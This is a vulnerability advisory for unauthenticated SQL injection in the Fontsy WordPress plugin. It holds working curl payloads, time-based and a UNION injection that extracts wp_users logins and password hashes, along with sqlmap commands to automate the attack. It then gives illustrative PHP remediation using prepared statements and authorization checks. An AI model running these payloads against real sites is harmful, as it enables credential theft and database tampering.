wpexploit | Cydave | WPEX-ID:6939C405-AC62-4144-BD86-944D7B89D0AD
History: Dec 21, 2022 - 12:00 a.m.

Fontsy <= 1.8.6 - Multiple Unauthenticated SQLi

2022-12-21 00:00:00
cydave
68
fontsy
sql injection
unauthenticated

EPSS

0.088

Percentile

94.7%

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
    --data 'id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
    --data 'id=1' \
    -p id \
    --risk 3 \
    --level 5 \
    --dbms mysql \
    --batch

---

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
    --data 'id=-1 UNION ALL SELECT NULL,NULL,NULL,CONCAT((SELECT user_login from wp_users),CHR(0x3a),(SELECT user_pass from wp_users)),NULL-- -'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
    --data 'id=1' \
    -p id \
    --risk 3 \
    --level 5 \
    --dbms mysql \
    --batch

---

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
    --data 'font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
    --data 'font_id=1' \
    -p font_id \
    --risk 3 \
    --level 5 \
    --dbms mysql \
    --batch
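The root cause described above is a request parameter (id, font_id) concatenated into a SQL statement inside an AJAX callback registered for unauthenticated users. The following is an added, illustrative PHP example written for this page, not the Fontsy plugin's actual source: the handler shapes, the table name fontsy_fonts, the function names, the nonce action name and the required capability are all assumptions. It shows the vulnerable pattern next to the hardened form using $wpdb->prepare() and, for the destructive delete_fonts action, an authorization check on top of the prepared statement.

```php
<?php
// Illustrative only (assumed handler shapes modelled on the advisory; the
// table fontsy_fonts, the function names, the nonce action and the capability
// are hypothetical). Not the plugin's real code.

// --- BEFORE: the pattern the advisory describes ---------------------------
// The raw request value is interpolated into the query, and the action is
// registered with wp_ajax_nopriv_, so no login is needed to reach it.
function fontsy_get_fonts_vulnerable() {
    global $wpdb;
    $id  = $_POST['id'];                                   // untrusted, unescaped
    $sql = "SELECT * FROM {$wpdb->prefix}fontsy_fonts WHERE id = " . $id;
    $rows = $wpdb->get_results( $sql );                    // caller controls the WHERE clause
    wp_send_json_success( $rows );
}
// add_action( 'wp_ajax_nopriv_get_fonts', 'fontsy_get_fonts_vulnerable' );  // shown for contrast only

// --- AFTER: bind the value instead of interpolating it --------------------
function fontsy_get_fonts_fixed() {
    global $wpdb;
    // absint() coerces to a non-negative integer; %d in prepare() binds it as
    // an integer, so no SQL from the request can reach the parser.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }
    $sql = $wpdb->prepare(
        "SELECT id, name, url FROM {$wpdb->prefix}fontsy_fonts WHERE id = %d",
        $id
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}
// A read-only lookup may legitimately stay reachable without login if the
// front end needs it; the prepared statement is what closes the injection.
add_action( 'wp_ajax_get_fonts',        'fontsy_get_fonts_fixed' );
add_action( 'wp_ajax_nopriv_get_fonts', 'fontsy_get_fonts_fixed' );

// get_tag_fonts takes the same id parameter and gets the same treatment; a
// UNION-based payload has nothing to attach to once the value is bound.

// --- delete_fonts: prepared statement plus authorization -------------------
function fontsy_delete_fonts_fixed() {
    global $wpdb;
    // A destructive action should require a nonce and a capability; it should
    // not be registered under wp_ajax_nopriv_ at all.
    check_ajax_referer( 'fontsy_delete_font', 'nonce' );       // hypothetical nonce action
    if ( ! current_user_can( 'manage_options' ) ) {            // assumed capability
        wp_send_json_error( 'forbidden', 403 );
    }
    $font_id = isset( $_POST['font_id'] ) ? absint( $_POST['font_id'] ) : 0;
    if ( 0 === $font_id ) {
        wp_send_json_error( 'invalid font_id', 400 );
    }
    $deleted = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$wpdb->prefix}fontsy_fonts WHERE id = %d", $font_id )
    );
    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
add_action( 'wp_ajax_delete_fonts', 'fontsy_delete_fonts_fixed' );   // logged-in only
```

When reviewing a plugin for this class of bug, the two things to check per AJAX callback are whether every value that reaches $wpdb comes through $wpdb->prepare() (or a strict cast such as absint()), and whether the wp_ajax_nopriv_ registration is actually warranted for what the callback does; the time-based and UNION payloads in the proof of concept above both fail once the first condition holds, and the delete action stops being reachable by anonymous callers once the second is fixed.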
